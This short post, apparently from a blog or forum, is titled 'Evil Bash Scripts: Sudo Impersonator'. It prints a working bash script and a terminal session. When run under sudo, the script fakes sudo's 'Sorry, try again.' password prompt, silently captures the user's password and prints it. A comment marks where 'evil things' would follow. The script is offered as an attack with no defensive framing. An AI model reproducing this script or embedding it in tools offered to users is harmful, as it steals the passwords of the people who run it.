Evil Bash Scripts: Sudo Impersonator
[runassudo@NEXUS tmp]$ cat awesomeprogram #!/bin/bash if [[ $EUID -ne 0 ]]; then echo "This script must be run as root" else echo "Sorry, try again." echo -n "[sudo] password for $SUDO_USER: " read -s tmp echo "" echo "PASSWORD IS $tmp" # Do evil things fi [runassudo@NEXUS tmp]$ ./awesomeprogram This script must be run as root [runassudo@NEXUS tmp]$ sudo ./awesomeprogram [sudo] password for runassudo: Sorry, try again. [sudo] password for runassudo: PASSWORD IS password